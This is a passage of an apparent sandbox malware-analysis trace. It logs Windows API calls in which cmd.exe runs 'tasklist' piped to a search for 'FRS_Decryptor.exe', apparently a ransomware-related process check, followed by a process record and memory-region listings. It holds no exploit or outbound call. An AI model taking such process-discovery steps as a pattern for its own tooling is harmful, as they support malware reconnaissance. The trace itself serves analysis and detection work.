lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xb7f674 | out: lpCommandLine="tasklist", lpProcessInformation=0xb7f674*(hProcess=0x64, hThread=0x60, dwProcessId=0x9e0, dwThreadId=0x93c)) returned 1 [0135.460] CloseHandle (hObject=0x60) returned 1 [0135.460] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0135.460] GetEnvironmentStringsW () returned 0xd342d8* [0135.460] FreeEnvironmentStringsA (penv="=") returned 1 [0135.460] DeleteProcThreadAttributeList (in: lpAttributeList=0xb7f6a0 | out: lpAttributeList=0xb7f6a0) [0135.460] _get_osfhandle (_FileHandle=3) returned 0x54 [0135.460] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0135.460] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0135.460] _close (_FileHandle=5) returned 0 [0135.460] _dup (_FileHandle=0) returned 4 [0135.460] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0135.460] _close (_FileHandle=3) returned 0 [0135.460] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0135.461] SetErrorMode (uMode=0x0) returned 0x0 [0135.461] SetErrorMode (uMode=0x1) returned 0x0 [0135.461] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd342e0, lpFilePart=0xb7f744 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xb7f744*="Desktop") returned 0x1c [0135.461] SetErrorMode (uMode=0x0) returned 0x1 [0135.461] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.461] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0135.461] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.461] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.461] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xb7f4d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f4d0) returned 0xffffffff [0135.461] GetLastError () returned 0x2 [0135.461] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.461] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xb7f4d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f4d0) returned 0xd35628 [0135.461] FindClose (in: hFindFile=0xd35628 | out: hFindFile=0xd35628) returned 1 [0135.462] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xb7f4d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f4d0) returned 0xffffffff [0135.462] GetLastError () returned 0x2 [0135.462] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xb7f4d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f4d0) returned 0xd35628 [0135.462] FindClose (in: hFindFile=0xd35628 | out: hFindFile=0xd35628) returned 1 [0135.462] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0135.462] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0135.462] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0135.462] SetErrorMode (uMode=0x0) returned 0x0 [0135.462] SetErrorMode (uMode=0x1) returned 0x0 [0135.462] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd34668, lpFilePart=0xb7f4ec | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xb7f4ec*="Desktop") returned 0x1c [0135.462] SetErrorMode (uMode=0x0) returned 0x1 [0135.462] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0135.462] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0135.463] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.463] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.463] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xb7f278, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f278) returned 0xffffffff [0135.463] GetLastError () returned 0x2 [0135.463] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.463] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xb7f278, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f278) returned 0xd304a0 [0135.463] FindClose (in: hFindFile=0xd304a0 | out: hFindFile=0xd304a0) returned 1 [0135.463] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xb7f278, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f278) returned 0xffffffff [0135.464] GetLastError () returned 0x2 [0135.464] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xb7f278, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb7f278) returned 0xd304a0 [0135.464] FindClose (in: hFindFile=0xd304a0 | out: hFindFile=0xd304a0) returned 1 [0135.464] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0135.464] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0135.464] GetConsoleTitleW (in: lpConsoleTitle=0xb7f774, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0135.464] InitializeProcThreadAttributeList (in: lpAttributeList=0xb7f6a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xb7f684 | out: lpAttributeList=0xb7f6a0, lpSize=0xb7f684) returned 1 [0135.464] UpdateProcThreadAttribute (in: lpAttributeList=0xb7f6a0, dwFlags=0x0, Attribute=0x60001, lpValue=0xb7f68c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xb7f6a0, lpPreviousValue=0x0) returned 1 [0135.464] GetStartupInfoW (in: lpStartupInfo=0xb7f6d8 | out: lpStartupInfo=0xb7f6d8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x154, hStdError=0x2c)) [0135.464] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0135.464] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0135.464] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0135.464] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0135.464] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0135.464] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.464] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.464] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0135.464] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0135.464] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0135.465] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0135.465] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0135.466] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xb7f628*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xb7f674 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0xb7f674*(hProcess=0x60, hThread=0x54, dwProcessId=0x840, dwThreadId=0x928)) returned 1 [0135.469] CloseHandle (hObject=0x54) returned 1 [0135.470] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0135.470] GetEnvironmentStringsW () returned 0xd3ad78* [0135.470] FreeEnvironmentStringsA (penv="=") returned 1 [0135.470] DeleteProcThreadAttributeList (in: lpAttributeList=0xb7f6a0 | out: lpAttributeList=0xb7f6a0) [0135.470] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0135.470] _close (_FileHandle=4) returned 0 [0135.470] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0135.902] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0xb7f9e8 | out: lpExitCode=0xb7f9e8*=0x0) returned 1 [0135.902] CloseHandle (hObject=0x64) returned 1 [0135.903] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0135.904] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0xb7f9e8 | out: lpExitCode=0xb7f9e8*=0x0) returned 1 [0135.904] CloseHandle (hObject=0x60) returned 1 [0135.904] _get_osfhandle (_FileHandle=1) returned 0x154 [0135.904] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0135.904] _get_osfhandle (_FileHandle=1) returned 0x154 [0135.904] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0135.905] _get_osfhandle (_FileHandle=0) returned 0x24 [0135.905] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0135.905] SetConsoleInputExeNameW () returned 0x1 [0135.905] GetConsoleOutputCP () returned 0x1b5 [0135.905] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0135.905] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.905] exit (_Code=0) Process: id = "148" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x2259f000" os_pid = "0x9e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "147" os_parent_pid = "0xbb4" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7614 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 7615 start_va = 0x9e0000 end_va = 0x9fffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 7616 start_va = 0xa00000 end_va = 0xa01fff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 7617 start_va = 0xa10000 end_va = 0xa1efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 7618 start_va = 0xa20000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 7619 start_va = 0xa60000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 7620 start_va = 0xaa0000 end_va = 0xaa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 7621 start_va = 0xab0000 end_va = 0xab0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 7622 start_va = 0xac0000 end_va = 0xac1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 7623 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7624 start_va = 0x7f830000 end_va = 0x7f852fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f830000" filename = "" Region: id = 7625 start_va = 0x7f859000 end_va = 0x7f859fff entry_point = 0x0 region_type = private name = "private_0x000000007f859000" filename = "" Region: id = 7626 start_va = 0x7f85a000 end_va = 0x7f85cfff entry_point = 0x0 region_type = private name = "private_0x000000007f85a000" filename = "" Region: id = 7627 start_va = 0x7f85d000 end_va = 0x7f85dfff entry_point = 0x0 region_type = private name = "private_0x000000007f85d000" filename = "" Region: id = 7628 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7629 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7630 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7631 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7651 start_va = 0xad0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 7652 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7653 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7654 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7659 start_va = 0x9e0000 end_va = 0x9effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 7660 start_va = 0x9f0000 end_va = 0x9f3fff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 7661 start_va = 0xa00000 end_va = 0xa02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 7662 start_va = 0xae0000 end_va = 0xb5dfff entry_point = 0xae0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7663 start_va = 0xb60000 end_va = 0xb60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 7664 start_va = 0xb70000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 7665 start_va = 0xb80000 end_va = 0xb80fff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 7666 start_va = 0xb90000 end_va = 0xb90fff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 7667 start_va = 0xba0000 end_va = 0xba3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 7668 start_va = 0xbb0000 end_va = 0xbb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Region: id = 7669 start_va = 0xbc0000 end_va = 0xbc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 7670 start_va = 0xbd0000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 7671 start_va = 0xc10000 end_va = 0xc4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 7672 start_va = 0xc50000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7673 start_va = 0xd50000 end_va = 0xed7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 7674 start_va = 0xee0000 end_va = 0x1060fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ee0000" filename = "" Region: id = 7675 start_va = 0x1070000 end_va = 0x246ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001070000" filename = "" Region: id = 7676 start_va = 0x2470000 end_va = 0x25b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002470000" filename = "" Region: id = 7677 start_va = 0x25c0000 end_va = 0x2894fff entry_point = 0x25c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7678 start_va = 0x28a0000 end_va = 0x2c9bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028a0000" filename = "" Region: id = 7679 start_va = 0x73430000 end_va = 0x73471fff entry_point = 0x73430000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 7680 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 7681 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 7682 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 7683 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 7684 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 7685 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 7686 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 7687 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 7688 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 7689 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 7690 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 7691 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 7692 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 7693 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7694 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7695 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7696 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7697 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7698 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7699 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7700 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 7701 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7702 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 7703 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7704 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 7705 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 